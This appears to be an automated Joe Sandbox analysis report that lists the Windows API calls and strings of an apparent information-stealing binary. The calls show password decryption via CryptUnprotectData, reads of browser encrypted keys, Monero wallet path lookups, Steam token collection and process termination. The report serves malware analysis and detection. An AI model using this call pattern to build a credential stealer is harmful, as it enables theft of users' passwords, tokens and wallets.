                                    • Part of subcall function 00347750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0034778D
                                    • Part of subcall function 00347750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003477AD
                                    • Part of subcall function 00347750: LocalFree.KERNEL32(?), ref: 003477B7
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003478EC
                                  • HeapFree.KERNEL32(00000000), ref: 003478F3
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00347A35
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                  • String ID: Password
                                  • API String ID: 356768136-3434357891
                                  • Opcode ID: ed34c642eac49e8d47b5a097ace46c0db829391af4889df14938c490519e9bb6
                                  • Instruction ID: 8a343c2a802e91661adc869f6b41a0bd12c03096ad16912473888a7a2a3b521e
                                  • Opcode Fuzzy Hash: ed34c642eac49e8d47b5a097ace46c0db829391af4889df14938c490519e9bb6
                                  • Instruction Fuzzy Hash: 467121B1D0021DAFDB11DF95DC819EEB7F9EF44300F144569E509AB240EB356A85CFA0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00341135
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0034113C
                                  • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00341159
                                  • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00341173
                                  • RegCloseKey.ADVAPI32(?), ref: 0034117D
                                  Strings
                                  • SOFTWARE\monero-project\monero-core, xrefs: 0034114F
                                  • wallet_path, xrefs: 0034116D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                  • API String ID: 3225020163-4244082812
                                  • Opcode ID: c516e6498319cf24aa7ac386c0c3ddf71252e2b0d6e936ac1dab9491916020d5
                                  • Instruction ID: ab39e55222d04467cbc64e0389ccc36a7e02a4114cf6e3b951f35816c0bd5e6d
                                  • Opcode Fuzzy Hash: c516e6498319cf24aa7ac386c0c3ddf71252e2b0d6e936ac1dab9491916020d5
                                  • Instruction Fuzzy Hash: 28F03075680358BBD7109BE5AC4EFEA7B7CEB14715F104154FE09E6280E6B05A88A7A0
                                  APIs
                                  • memcmp.MSVCRT(?,v20,00000003), ref: 00349E04
                                  • memcmp.MSVCRT(?,v10,00000003), ref: 00349E42
                                  • LocalAlloc.KERNEL32(00000040), ref: 00349EA7
                                    • Part of subcall function 003671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003671FE
                                  • lstrcpy.KERNEL32(00000000,00374C48), ref: 00349FB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpymemcmp$AllocLocal
                                  • String ID: @$v10$v20
                                  • API String ID: 102826412-278772428
                                  • Opcode ID: 9abae82c7e35748f46a5c6dcedbecceea5d6c371c22339d5499096d5dc6139b8
                                  • Instruction ID: 81f0f9e2824844ea2d3fd130f4a18bc7132618c3c4627f630dd4c78a63ead0c9
                                  • Opcode Fuzzy Hash: 9abae82c7e35748f46a5c6dcedbecceea5d6c371c22339d5499096d5dc6139b8
                                  • Instruction Fuzzy Hash: 36518931A10209ABCB22EF68DC85B9F77E8AF54315F554025FD09AF241DB70FD558BA0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0034565A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00345661
                                  • InternetOpenA.WININET(0036CFEC,00000000,00000000,00000000,00000000), ref: 00345677
                                  • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00345692
                                  • InternetReadFile.WININET(?,?,00000400,00000001), ref: 003456BC
                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 003456E1
                                  • InternetCloseHandle.WININET(?), ref: 003456FA
                                  • InternetCloseHandle.WININET(00000000), ref: 00345701
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                  • String ID:
                                  • API String ID: 1008454911-0
                                  • Opcode ID: f05811a94d63bc294a2ed56b6d534beb0c98468fd1720fbaf7cbc4a2f7ae31eb
                                  • Instruction ID: c7893d687db90e1caa79d0cc77803ce6b0d47e28083f4c416ac324e190979864
                                  • Opcode Fuzzy Hash: f05811a94d63bc294a2ed56b6d534beb0c98468fd1720fbaf7cbc4a2f7ae31eb
                                  • Instruction Fuzzy Hash: 6E417D70E00205AFDB15CF54ED88FAABBF5FF48311F158069E9089B291D771A985DF90
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00364759
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00364769
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0036477B
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0036479C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 003647AB
                                  • CloseHandle.KERNEL32(00000000), ref: 003647B2
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 003647C0
                                  • CloseHandle.KERNEL32(00000000), ref: 003647CB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: 48517e9b2c7d0be2d090f640f4a0fdc301af7518bbcdd97fcbb97a632c9d835f
                                  • Instruction ID: 0361213f989c2782ba06befe1b8f832720bbb300c0ca5d33a4587a9654308dd3
                                  • Opcode Fuzzy Hash: 48517e9b2c7d0be2d090f640f4a0fdc301af7518bbcdd97fcbb97a632c9d835f
                                  • Instruction Fuzzy Hash: 2501B171A41214AFE7225F60AC8DFEA77BCEB59752F004194F90ED1180EF708DC8AAA0
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00358435
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035846C
                                  • lstrlen.KERNEL32(00000000), ref: 003584B2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003584E9
                                  • lstrlen.KERNEL32(00000000), ref: 003584FF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035852E
                                  • StrCmpCA.SHLWAPI(00000000,00374C3C), ref: 0035853E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: bd71a31ce6e386b8cfe221694180549e1f53450edb1fb2ac06da2e67c5318658
                                  • Instruction ID: 194002685af8bb3b86a048959f00c33e63604fad8584f8c7dce7ee74c834ec58
                                  • Opcode Fuzzy Hash: bd71a31ce6e386b8cfe221694180549e1f53450edb1fb2ac06da2e67c5318658
                                  • Instruction Fuzzy Hash: 245181755002029FCB22DF29D884E6BB7F9EF59301F258859EC45EB255EF30E949CBA0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00362925
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0036292C
                                  • RegOpenKeyExA.ADVAPI32(80000002,00F9B8B8,00000000,00020119,003628A9), ref: 0036294B
                                  • RegQueryValueExA.ADVAPI32(003628A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00362965
                                  • RegCloseKey.ADVAPI32(003628A9), ref: 0036296F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: a592783d142adfcf2b4a0a9031c113c642aa59715fe886dc6a01ea8e6355cf23
                                  • Instruction ID: 1ade4dbb520d24c5fb0efaab0c9053f9aa5ed4ca0e731cdcbde848ac7767bc71
                                  • Opcode Fuzzy Hash: a592783d142adfcf2b4a0a9031c113c642aa59715fe886dc6a01ea8e6355cf23
                                  • Instruction Fuzzy Hash: A501D475A40314ABD310CBA0EC5DEFB7BBCEB48711F104058FE49D7240EB715958A7A0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00362895
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0036289C
                                    • Part of subcall function 00362910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00362925
                                    • Part of subcall function 00362910: RtlAllocateHeap.NTDLL(00000000), ref: 0036292C
                                    • Part of subcall function 00362910: RegOpenKeyExA.ADVAPI32(80000002,00F9B8B8,00000000,00020119,003628A9), ref: 0036294B
                                    • Part of subcall function 00362910: RegQueryValueExA.ADVAPI32(003628A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00362965
                                    • Part of subcall function 00362910: RegCloseKey.ADVAPI32(003628A9), ref: 0036296F
                                  • RegOpenKeyExA.ADVAPI32(80000002,00F9B8B8,00000000,00020119,00359500), ref: 003628D1
                                  • RegQueryValueExA.ADVAPI32(00359500,00FAD9D0,00000000,00000000,00000000,000000FF), ref: 003628EC
                                  • RegCloseKey.ADVAPI32(00359500), ref: 003628F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 388c5fe5d46a72166a309579bd6c62e0e29fc67388d5f0f5abcedce01f3d29fa
                                  • Instruction ID: f1185bae56519478c0a4e00a1ee4571cda27b23486aad1e6ac64dc6c8d326048
                                  • Opcode Fuzzy Hash: 388c5fe5d46a72166a309579bd6c62e0e29fc67388d5f0f5abcedce01f3d29fa
                                  • Instruction Fuzzy Hash: 4301A2B5650218BBD7109BA4BC4DEBB777DEB54311F004154FE0CD7250DA705988B7A0
                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 0034723E
                                  • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00347279
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00347280
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 003472C3
                                  • HeapFree.KERNEL32(00000000), ref: 003472CA
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00347329
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                  • String ID:
                                  • API String ID: 174687898-0
                                  • Opcode ID: 15aebfce354a658d8345803d64b66203670006ad9e8ff945c9b8ee3dfd7a02e0
                                  • Instruction ID: 0aec643c5715612a2debf82d8d9511eb539aac03e5ddc0997e75e94a39d6fb5a
                                  • Opcode Fuzzy Hash: 15aebfce354a658d8345803d64b66203670006ad9e8ff945c9b8ee3dfd7a02e0
                                  • Instruction Fuzzy Hash: 47414B75A056069BDB21CF69EC84BAAB3E8EB84305F144569EC4DCB310E771F944ABA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 00349CA8
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00349CDA
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00349D03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2746078483-738592651
                                  • Opcode ID: aff461d0a83c64c6dd78fb9259cb52a276f9269df3fed2266c62983ed0048c6b
                                  • Instruction ID: 5983c0373c2dda49ff734dd8de1273a3d68454d93666d7331721ab1c1859885d
                                  • Opcode Fuzzy Hash: aff461d0a83c64c6dd78fb9259cb52a276f9269df3fed2266c62983ed0048c6b
                                  • Instruction Fuzzy Hash: D4417C31E002099BCB22EF64DC85AAFB7F4AF55304F4545A5FD25AF262DA30BD05C7A0
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0035EA24
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035EA53
                                  • lstrcat.KERNEL32(?,00000000), ref: 0035EA61
                                  • lstrcat.KERNEL32(?,00371794), ref: 0035EA7A
                                  • lstrcat.KERNEL32(?,00FA88F8), ref: 0035EA8D
                                  • lstrcat.KERNEL32(?,00371794), ref: 0035EA9F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: 0544b00c57766eb85e71c39cac1d5b979529100f7f9c3f5290a217a0120bf88d
                                  • Instruction ID: 416bbd7ae393bfa13d4a89fd49e1f972ac8c542ab0589f8c36cf14d0f8954ef1
                                  • Opcode Fuzzy Hash: 0544b00c57766eb85e71c39cac1d5b979529100f7f9c3f5290a217a0120bf88d
                                  • Instruction Fuzzy Hash: 8D418971910119ABCB26EF64EC46EEE77B4BF58300F404454FA1AAF250DE70AF889F60
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0035ECDF
                                  • lstrlen.KERNEL32(00000000), ref: 0035ECF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035ED1D
                                  • lstrlen.KERNEL32(00000000), ref: 0035ED24
                                  • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0035ED52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: steam_tokens.txt
                                  • API String ID: 367037083-401951677
                                  • Opcode ID: 3783a6a60b90051c3aba31e933fc4ac834b7a8eae2c6a3da41522aad31b8fe52
                                  • Instruction ID: 45a4fba214f4aa6d8e068c4584f5a5e91b919f8d0fadcaebb5c62cc7a74efa2e
                                  • Opcode Fuzzy Hash: 3783a6a60b90051c3aba31e933fc4ac834b7a8eae2c6a3da41522aad31b8fe52
                                  • Instruction Fuzzy Hash: 23315C31A105155BC723BB78EC4A96F7BE8AF14301F855060FC49AF322DF20ED2987A1
                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0034140E), ref: 00349A9A
                                  • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0034140E), ref: 00349AB0
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,0034140E), ref: 00349AC7
                                  • ReadFile.KERNEL32(00000000,00000000,?,0034140E,00000000,?,?,?,0034140E), ref: 00349AE0
                                  • LocalFree.KERNEL32(?,?,?,?,0034140E), ref: 00349B00
                                  • CloseHandle.KERNEL32(00000000,?,?,?,0034140E), ref: 00349B07
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: 54eadf728114f74c32f82d8e23ddba5e63abbea2309e5f66dab7fdc5c8f5bb18
                                  • Instruction ID: aca5aefb6fb8b7dadab7ad69d688ed3a58c1a58515586422fc4b438b66de6a8f
                                  • Opcode Fuzzy Hash: 54eadf728114f74c32f82d8e23ddba5e63abbea2309e5f66dab7fdc5c8f5bb18
                                  • Instruction Fuzzy Hash: 9D115E71600209AFE711DFA9EC88FBB73BCEB14340F11015AF905AA280EB70AD54DBA1
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00365B14
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A188
                                    • Part of subcall function 0036A173: std::exception::exception.LIBCMT ref: 0036A1AE
                                  • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00365B7C
                                  • memmove.MSVCRT(00000000,?,?), ref: 00365B89
                                  • memmove.MSVCRT(00000000,?,?), ref: 00365B98
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long
                                  • API String ID: 2052693487-3788999226
                                  • Opcode ID: f8f09782f2fc6bfac8b99718085d888b820170711e181793d211f0d30f49a557
                                  • Instruction ID: 147d8d43dcebe8742df508380dd52dae268105405ebb8c268e605c9ebd1dd4d5
                                  • Opcode Fuzzy Hash: f8f09782f2fc6bfac8b99718085d888b820170711e181793d211f0d30f49a557
                                  • Instruction Fuzzy Hash: 07417171B006199FCF19DF6CC895AAEBBB5EB88310F15C239E909EB348D630DD018B90
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00357D58
                                    • Part of subcall function 0036A1C0: std::exception::exception.LIBCMT ref: 0036A1D5
                                    • Part of subcall function 0036A1C0: std::exception::exception.LIBCMT ref: 0036A1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00357D76
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00357D91
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                  • String ID: invalid string position$string too long
                                  • API String ID: 3310641104-4289949731
                                  • Opcode ID: 92f92ec803ddd33ce2068e63b03a448508254f2e0c377d07b17fa1e93bedf952
                                  • Instruction ID: 1fe3fd567a3e21a375ce5bf39c890c4990368a350a8ef978f840f31a096859fa
                                  • Opcode Fuzzy Hash: 92f92ec803ddd33ce2068e63b03a448508254f2e0c377d07b17fa1e93bedf952
                                  • Instruction Fuzzy Hash: 6021E9323147004BD722DE6CE881E3AF7F5EF91751B214A2EE8458B261D771DC0487A1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003633EF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003633F6
                                  • GlobalMemoryStatusEx.KERNEL32 ref: 00363411
                                  • wsprintfA.USER32 ref: 00363437
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   Joe Sandbox IDA Plugin
                                   • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB
                                  • API String ID: 2922868504-2651807785
